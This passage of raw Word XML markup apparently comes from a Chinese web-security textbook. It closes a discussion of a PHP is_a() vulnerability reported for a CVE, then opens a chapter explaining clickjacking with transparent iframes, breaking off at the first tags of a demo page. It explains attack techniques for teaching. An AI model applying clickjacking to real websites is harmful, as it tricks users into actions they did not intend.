          <w:pgMar w:header="936" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="113"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>我们可以预见到，在未来互联网发展的过程中，也必然会有更多、更古怪的攻击方式出现， 也必然会让更多的原本是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:hAnsi="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>的东西，变成漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto"/>
        <w:ind w:left="202" w:right="226" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后，也许你已经看出来了，我并不是要说服谁 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>is_a()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个漏洞，而是在思考，谁该为这些损失买单？我们未来遇到同样的问题怎么办？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>对于白帽子来说，我们习惯于分解问题，同一个问题，我们可以在不同层面解决，可以通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>过良好的代码规范去保证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>事实上，所有的安全问题都能这么修复，只是需要付出的成本过于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>巨大</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，但只有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>HP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>在源头修补了这个问题，才真正是善莫大焉。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="535" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="202" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>BTW</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>is_a()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数的问题已经申报了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果不出意外，</w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>security@php.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也会接受这个问题，所以它已经是一个既成事实的漏洞了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="535" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="86"/>
        <w:ind w:left="0" w:right="218" w:firstLine="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="05" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>第 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:b/>
          <w:sz w:val="80"/>
        </w:rPr>
        <w:t>5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU" w:eastAsia="PMingLiU" w:hint="eastAsia"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0" w:right="243"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="115"/>
        </w:rPr>
        <w:t>点击劫持（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="115"/>
        </w:rPr>
        <w:t>ClickJacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="115"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="PMingLiU"/>
          <w:sz w:val="79"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2008  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年，安全专家 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Robert  Hansen  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>与 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Jeremiah  Grossman  </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>发现了一种被他们称为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:ind w:right="124"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-159"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>（点击劫持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>的攻击，这种攻击方式影响了几乎所有的桌面平台，包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-50"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-60"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>ari</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="72"/>
        <w:ind w:left="203" w:right="223"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Opera </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>以及 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Adobe Flash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>。两位发现者准备在当年的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>OWASP </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>安全大会上公布并进行演</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>示，但包括 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Adobe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>在内的所有厂商，都要求在漏洞修补前不要公开此问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>什么是点击劫持</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="301"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，覆盖在一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>个网页上，然后诱使用户在该网页上进行操作，此时用户将在不知情的情况下点击透明的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t>页面。通过调整 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>页面的位置，可以诱使用户恰好点击在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>页面的一些功能性按钮上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="3136">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>838790</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>101482</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3822811" cy="1921097"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="13" name="image9.jpeg" descr=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="14" name="image9.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3822811" cy="1921097"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="161"/>
        <w:ind w:left="0" w:right="20" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>点击劫持原理示意图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>看下面这个例子。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="120" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="position:absolute;margin-left:12.72pt;margin-top:37.237003pt;width:411.15pt;height:20.05pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:3160;mso-wrap-distance-left:0;mso-wrap-distance-right:0" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;!DOCTYPE html&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;html&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.a.com/test.html </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>页面中插入了一个指向目标网站的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>，出于演示的目的， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>我们让这个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>iframe </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>变成半透明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="309" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId30"/>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="0" w:footer="0" w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="174"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:pict>
          <v:shape style="width:411.15pt;height:330pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" type="#_x0000_t202" filled="true" fillcolor="#dadada" stroked="false">
            <w10:anchorlock/>
            <v:textbox inset="0,0,0,0">
              <w:txbxContent>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="8"/>
                    <w:ind w:left="448" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;head&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="18"/>
                    <w:ind w:left="868" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
